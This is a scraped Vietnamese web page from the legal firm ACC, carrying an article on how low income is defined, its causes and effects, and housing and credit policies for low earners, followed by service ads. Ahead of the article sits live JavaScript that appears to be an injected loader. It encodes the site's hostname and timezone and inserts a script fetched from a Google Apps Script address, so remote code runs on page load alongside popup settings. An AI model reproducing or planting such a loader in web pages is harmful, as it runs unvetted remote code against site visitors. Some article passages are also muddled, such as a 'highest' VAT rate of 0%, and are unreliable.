var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Xác định mức thu nhập thấp là bao nhiêu? [Năm 2023]

Người lao động quan tâm hàng đầu đối với mọi ngành nghề là mức thu nhập của công việc mà họ ứng tuyển. Bởi vì thu nhập ảnh hưởng đến chất lượng cuộc sống của họ rất nhiều. Trong bài viết này, ACC sẽ giúp bạn đọc tìm hiểu về mức thu nhập thấp và các khía cạnh liên quan đến vấn đề này. Mời bạn đọc theo dõi.

Xác định Mức Thu Nhập Thấp Là Bao Nhiêu

Định rõ mức thu nhập thấp là bao nhiêu?

Thu nhập thấp là một khái niệm khó xác định. Các nghiên cứu đã không đưa ra được tiêu chuẩn cụ thể để định nghĩa người có thu nhập thấp. Bởi vì người lao động đều có các điều kiện sống, tình hình kinh tế xã hội và phong tục tập quán khác nhau tùy theo địa phương và dân tộc. Do đó, để định nghĩa người có thu nhập thấp, cần tiến hành khảo sát xã hội về thu nhập và chi tiêu của hộ gia đình.

Theo quan điểm của ngân hàng thế giới và UNDP, người thu nhập thấp dành ít nhất 66% thu nhập cho chi tiêu hàng ngày và chỉ dành 34% còn lại cho các chi phí khác như nhà ở, văn hoá, giáo dục, y tế, đi lại, quan hệ tiệc tùng và nhiều hơn nữa.

Xem thêm thu nhập bình thường là gì?

2. Nguyên nhân gây ra thu nhập thấp

Những căn nhà ở các thành phố lớn ngày nay đã trở nên quá đắt đỏ so với mức lương mà người lao động nhận được, khiến cho việc mua nhà trở nên khó khăn và dẫn đến tình trạng sống không tốt cho những người thiếu điều kiện.

Mức lương mà doanh nghiệp trả cho người lao động thấp hơn đủ để đáp ứng các nhu cầu sinh hoạt cần thiết.

Người lao động với trình độ và tay nghề còn thấp không đủ điều kiện để thực hiện các công việc kỹ thuật và yêu cầu kiến thức cao. Tuy nhiên, những ngành nghề này lại có khả năng mang lại thu nhập cao.

3. Hệ quả của mức thu nhập thấp

Những người có thu nhập thấp có mức sống ở nhóm trung bình hoặc thấp hơn.

Người thu nhập thấp phải dành một phần thu nhập để thuê nhà hoặc trả góp tiền sửa nhà, mua nhà, ngoài việc chi tiêu cho nhu cầu cơ bản, nhằm cải thiện điều kiện sống.

Người có thu nhập thấp phải sinh sống trong các ngôi nhà cũ kỹ không đủ điều kiện để sửa chữa hoặc cải tạo.

Những người có thu nhập ổn định và khả năng tích luỹ vốn để nâng cao điều kiện sống được hỗ trợ bởi Nhà nước thông qua việc vay vốn dài hạn trả góp. Đồng thời, họ cũng được hưởng ưu đãi về chính sách đất đai và cơ sở hạ tầng (với điều kiện khả năng trả nợ).

Là những người chưa sở hữu nhà hoặc sở hữu nhà nhưng diện tích ở hạn chế, S <=4m2/mỗi người.

4. Chính sách cho người có mức thu nhập thấp

Chính sách phát triển nhà ở: Xây dựng dự án nhà ở thu nhập thấp được hưởng các ưu đãi bao gồm: không phải trả tiền sử dụng đất, miễn tiền thuê đất trong khu vực dự án; được hưởng thuế giá trị gia tăng ở mức cao nhất (thuế suất 0%); được miễn thuế thu nhập doanh nghiệp trong 4 năm sau khi có thu nhập chịu thuế và giảm 50% trong 5 năm tiếp theo; áp thuế thu nhập doanh nghiệp 10% suốt thời gian hoạt động.

Chính sách nhà ở xã hội: Chính phủ sẽ hỗ trợ các dự án nhà ở xã hội và người mua nhà sẽ được hưởng mức giá ưu đãi hơn so với các căn hộ thương mại.

Các ngân hàng chính sách xã hội áp dụng chính sách tín dụng cho hộ nghèo, hộ cận nghèo và hộ thoát nghèo.

5. Câu hỏi liên quan thường gặp

5.1 Thu nhập là gì

Thu nhập là số tiền mà một cá nhân, doanh nghiệp hoặc một nền kinh tế nhận được trong một khoảng thời gian nhất định từ công việc, dịch vụ hoặc hoạt động nào đó.

Thu nhập có thể bao gồm các khoản như lương, công, thuê tài sản, lợi nhuận kinh doanh.

5.2 Lương cơ bản là gì

Lương cơ bản là mức lương tối thiểu mà một tổ chức, doanh nghiệp hoặc đơn vị thỏa thuận trả cho người lao động dựa trên từng trường hợp cụ thể. Mức lương này không bao gồm các khoản tiền thưởng, trợ cấp phúc lợi hoặc các khoản thu nhập khác và các khoản giảm trừ.

5.3 Thu nhập bình quân đầu người là gì

Thu nhập trung bình đầu người là một số liệu được tính bằng cách chia tổng thu nhập của một quốc gia cho số dân của nước đó. Phương pháp tính này không phân biệt giới tính, độ tuổi hay trẻ em và người lớn. Từ số liệu này, ta có thể đánh giá mức sống của người dân trong quốc gia đó.

Sau khi tìm hiểu về nội dung thu nhập và mức thu nhập thấp, hy vọng rằng bạn đọc cũng như những người lao động có thể xem xét và cân nhắc trước khi nộp ứng tuyển vào một công ty hay doanh nghiệp để đảm bảo bản thân được hưởng những quyền lợi đúng quy định của pháp luật. Nếu quý bạn đọc có thắc mắc về vấn đề thu nhập hoặc cần tư vấn về vấn đề pháp lý, xin vui lòng liên hệ trang web: accgroup.Vn.

✅ Dịch vụ thành lập công ty ⭕ ACC cung cấp dịch vụ thành lập công ty/ thành lập doanh nghiệp trọn vẹn chuyên nghiệp đến quý khách hàng toàn quốc
✅ Đăng ký giấy phép kinh doanh ⭐ Thủ tục bắt buộc phải thực hiện để cá nhân, tổ chức được phép tiến hành hoạt động kinh doanh của mình
✅ Dịch vụ ly hôn ⭕ Với nhiều năm kinh nghiệm trong lĩnh vực tư vấn ly hôn, chúng tôi tin tưởng rằng có thể hỗ trợ và giúp đỡ bạn
✅ Dịch vụ kế toán ⭐ Với trình độ chuyên môn rất cao về kế toán và thuế sẽ đảm bảo thực hiện báo cáo đúng quy định pháp luật
✅ Dịch vụ kiểm toán ⭕ Đảm bảo cung cấp chất lượng dịch vụ tốt và đưa ra những giải pháp cho doanh nghiệp để tối ưu hoạt động sản xuất kinh doanh hay các hoạt động khác
✅ Dịch vụ làm hộ chiếu ⭕ Giúp bạn rút ngắn thời gian nhận hộ chiếu, hỗ trợ khách hàng các dịch vụ liên quan và cam kết bảo mật thông tin